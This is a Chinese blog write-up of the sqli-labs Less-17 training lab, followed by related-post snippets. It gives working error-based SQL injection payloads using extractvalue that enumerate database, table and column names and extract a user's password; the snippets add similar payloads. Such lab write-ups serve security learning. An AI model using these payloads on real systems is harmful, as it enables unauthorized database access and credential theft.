[网络安全]sqli-labs Less-17 解题详析

原创 已于 2024-07-30 18:35:48 修改 · 3.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #数据库 #sql #sqlilabs #安全

于 2023-07-24 11:25:52 首次发布
本文解析了sqli-labs Less-17级别的SQL注入题目,通过extractvalue函数进行报错注入,详细介绍了如何判断注入类型、查找数据库名称、表名、列名以及数据,适用于网络安全学习者实践SQL注入技巧。

考察报错注入

本文使用extractvalue进行注入

原理及姿势可参考[网络安全]sqli-labs Less-5 解题详析

判断注入类型

由以下回显可知,注入类型为单引号注入

在这里插入图片描述

查库名

账号输入admin
密码输入:

1' and (extractvalue(1,concat(0x5c,database(),0x5c)))#

在这里插入图片描述
库名为security

查表名

账号输入admin
密码输入:

1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))#

在这里插入图片描述

回显四个表

查列名

账号输入admin
密码输入:

1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))#

在这里插入图片描述
得到三个列

查数据

账号输入admin
密码输入:

1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))#

在这里插入图片描述

总结

以上为[网络安全]sqli-labs Less-17 解题详析,后续将分享[网络安全]sqli-labs Less-18 解题详析.

我是秋说,我们下次见。

sqli-lab-less17
Sa1nZen的博客
08-04 275
sqli-lab-less17
Sqli-labs Less17 报错注入
beiweixiaotian66的博客
07-25 483
一丢丢Sqli-labs小练习
基于Sqli-Labs靶场的SQL注入-17~22关
Joker
01-03 2731
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
sqli-labs-Less-17
giun的博客
02-13 580
这一关与密码有关,我们尝试下报错 输入username:admin password=1' 故对密码处理时应该使用“ 报错注入 username:admin password:1'and extractvalue(1,concat(0x7e,(select version()),0x7e))# version()可以换成其他语句进行注入 延时注入 username:admin pass...
SQLi-labsLess-17
weixin_41182861的博客
08-01 266
Less-17 POST - Update Query- Error Based - String 在username中输入任何测试符号都无济于事。查看源码,后端对uname有过滤: function check_input($value) { if(!empty($value)) //检测这个形参是否为空。 { // truncation (see comments) $value = substr($value,0,15); //分割一串字符串的效果, 第二个参数是从第0个
精选资源
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
该资源包来源于GitHub上的一个开源项目,由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip,用户可以搭建一个模拟的SQL注入环境,从而在不危害真实系统的前提下,进行各种SQL注入攻击和防御的练习...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
01-18
Sqli-labs是一个在线的SQL注入练习平台,提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上,用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识,以便更好地应对现实世界中的网络攻击。
sqli-labs-master 靶场环境
最新发布
08-30
sqli-labs-master 靶场环境
精选资源
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
在信息技术安全领域,SQL注入是常见的攻击手段,攻击者通过在Web应用的输入字段中插入恶意SQL语句,试图破坏...phpStudy和Sqli-labs-maste的结合使用,为网络安全的学习和研究提供了一个安全、高效、便捷的学习平台。
Sqli-labs less-17
weixin_46099552的博客
08-15 586
会报错,所以应该使用报错注入(图放错了)在burp抓包后放进重放器然后直接粘贴就行。语句就知道应该是在密码上注入,输入。看对话框是新建用户,是。可以使用子查询来绕过。
floor报错注入的两种格式
aitong的博客
01-31 573
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
Sqli-labsLess-17
m0_46315342的博客
06-04 855
                                          &nbs...
Sqlilabs Less-17
Light_inthe_eyes的博客
03-07 204
PASSWORD RESET提醒此关可能是password的注入。查看源码,发现逻辑是需要先证明用户存在才能重置密码,既然我们知道admin用户,就直接注入吧。 判断是单引号字符型注入,无回显,用报错注入: uname=admin&passwd=abc'#&submit=Submit 爆库: uname=admin&passwd=abc'+and+extractvalue(1,concat(0x5c,(select+database())))#&submit=Submit
sqli-labs (less-17)
kukudeshuo的博客
03-11 441
sqli-labs (less-17) 进入17关,我们发现17关与前面关卡有所不同,他是要我们输入用户名然后修改密码,我们这里把密码依然改为admin等进去试试 我们继续利用hackbar抓取POST的内容,抓取后我们判断注入点。作者试了很多次,17关输入用户名的位置是没有注入点的,所以我们在更改密码的位置判断注入点 输入 uname=admin&passwd=admin'&submit=Submit #有完整错误回显 所以这里我们使用报错注入攻击 查看当前数据库 uname=adm
SQLI-LABS Less-17
Web学习之路
03-24 185
Update注入
sqli-labs (less 17)
Xi4or0uji
08-01 544
less 17 报错函数注入 在开始放出payload之前,可能要先稍微提一下 从后台源码可以看出,uname有个check_input函数过滤,但是passwd没有,所以注入点是在passwd上面 接下来还要看下extractvalue这个报错函数 这里推荐一下官方的解释和一篇讲得简单点的博客 https://dev.mysql.com/doc/refman/5.7/en/xml-f...
sqli-labs/Less-17
m0_71299382的博客
11-18 228
sqli-labs第十七关
sqlilabs less-17
TA不懒,但还没有添加简介
07-05 331
sqlilabs less-17
[网络安全]sqli-labs Less-1 解题
12-25
SQLi-Labs网络安全领域的一个练习平台,Less-1 是其中一道关于SQL注入攻击的经典题目。在这道题中,你需要利用SQL注入技巧来获取数据库中的敏感信息,通常会涉及HTML表单、GET或POST请求以及对数据库查询构造的...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值